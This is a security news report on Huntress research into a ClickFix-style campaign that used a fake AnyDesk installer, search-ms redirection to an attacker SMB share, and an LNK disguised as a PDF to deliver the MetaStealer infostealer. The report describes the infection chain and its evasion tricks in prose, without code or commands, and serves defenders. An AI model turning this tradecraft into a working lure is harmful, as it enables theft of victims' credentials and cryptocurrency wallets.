Attackers Weaponize File Explorer and Fake PDFs in ClickFix-Style MetaStealer Campaign

Researchers from Huntress have uncovered a malicious campaign that demonstrates a new twist on the widely known ClickFix attack technique. This technique has remained prominent since gaining traction in August 2024, where ClickFix lures victims into believing they must resolve a problem, usually through a CAPTCHA, and convinces them to run a command that fetches malware. Over time, attackers have refined the method into new “fix” variants such as FileFix, reported in June 2025, which leverages Windows File Explorer instead of the Run dialog. This latest campaign masqueraded as an AnyDesk installer, with the infection chain designed to trick victims into launching a sequence of commands that ultimately delivered MetaStealer, a commodity infostealer active since 2022. Huntress's discovery emphasizes the ongoing evolution of social engineering campaigns built around ClickFix-style deception, where each iteration blends user interaction with subtle abuse of native Windows functionality.

The attack chain relied on the Windows protocol handler to initiate execution. The crafted string abusing "search-ms" redirected the victim’s File Explorer to an attacker-controlled SMB share. “Windows File Explorer then directs the victim to an attacker-controlled SMB share, essentially a remote file share allowing clients to access files on a remote server over a network,” reports Huntress researchers. The share presented a file named "Readme Anydesk.pdf", which was not a document but a disguised Windows shortcut (LNK). Clicking the file initiated a sequence involving "cmd.exe" that launched Microsoft Edge to download a legitimate AnyDesk installer while also fetching a secondary file dropped into the user’s "TEMP" directory. Huntress noted, “Notably, this fake PDF is configured to grab the %COMPUTERNAME% environment variable as a subdomain… a clever way for the attacker to nab that information from the victim.” This step provided system-specific data to the attackers while maintaining a convincing lure.

Following the lure, the downloaded file was processed through "msiexec," which executed the MSI package disguised as the PDF. The original "cmd.exe" process was then terminated with "taskkill" to obscure the activity. Inside the MSI, further payloads included a malicious DLL and a CAB archive containing "1.js" for cleanup and "ls26.exe," the dropper for MetaStealer. The MetaStealer executable, protected with a packer, is consistent with previous samples known to target sensitive data including browser-stored credentials and cryptocurrency wallets. Huntress attributed this sequence as a demonstration of evolving attacker tradecraft, where the blending of benign processes, obfuscation through environment variables, and staged payload delivery converge into a campaign designed to evade detection. This case reflects the refinements attackers are applying to extend the lifespan of ClickFix-derived threats and maintain the technique's effectiveness.